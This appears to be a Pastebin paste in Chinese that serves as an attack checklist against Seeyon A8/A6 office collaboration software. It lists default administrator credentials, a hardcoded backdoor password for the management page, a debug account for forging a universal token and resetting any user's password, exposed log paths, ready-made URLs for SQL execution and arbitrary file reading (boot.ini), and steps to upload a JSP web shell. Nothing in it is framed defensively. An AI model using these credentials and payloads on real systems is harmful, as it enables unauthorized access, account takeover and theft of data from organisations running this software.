Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1:收集致远A8的公开的用户名及密码
- 系统管理员(所有版本)
- system system
- 集团管理员(企业集团版)
- group-admin 123456
- 单位管理员(企业版、政务版)
- admin1 123456
- 组织管理员(政务多组织版)
- gov-admin 123456
- 审计管理员(所有版本)
- audit-admin 123456
- A8-V5[企业版]默认超级管理员:system:system
- A8-V5[集团版]默认超级管理员:group-admin:123456
- 2:获取token 修改用户密码
- /seeyon/services/authorityService?wsdl
- 通过调试接口的默认用户
- userName:service-admin
- password:123456
- 获取万能Token
- 之后可以修改任意用户密码。
- 案例:致远A8协同系统存在任意用户密码修改漏洞(秒改)
- 3:获取LoginName
- 访问地址:
- /seeyon/logs/ //设置不当结合目录浏览漏洞
- /seeyon/logs/login.log
- /seeyon/logs/ctp.log
- /seeyon/logs/uc.log //如果UC配置在互联网或者本地恶意员工利用可以劫持UC登录。
- 4:暴力破解,平行越权
- 致远A8-V5存在两个漏洞
- 一是无视验证码撞库
- 二是任意用户密码修改
- 案例:致远A8-V5存在任意用户密码修改漏洞
- 5:A8-m seeyon后台万能密码
- 密码:WLCCYBD@SEEYON
- 登陆地址: /seeyon/management/status.jsp
- 成功之后 输入 login 查看登录日志
- 6:A6-m存在执行SQL语句页面回显功能
- /yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadir
- 7:A8 存在未授权访问
- 该地址为性能监控后台,存在未授权访问
- seeyon/management/status.jsp
- 任意文件读取漏洞,由于对filename未进行过滤,导致可下载读取任意文件
- http://x.x.x.x/seeyon/main.do?method=officeDown&filename=c:/boot.ini
- 详细案例:用友致远A8协同管理软件未授权访问+Getshell
- 8:登陆后台,Getshell
- 1.利用合法会话获取模板的ID
- 2.突破限制上传jsp可执行文件
- 3.利用动态迁移技术将缓存到web目录以外的文件迁移到web任意目录
- 案例:致远A8-V5协同管理软件普通用户任意文件上传(通杀V5)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement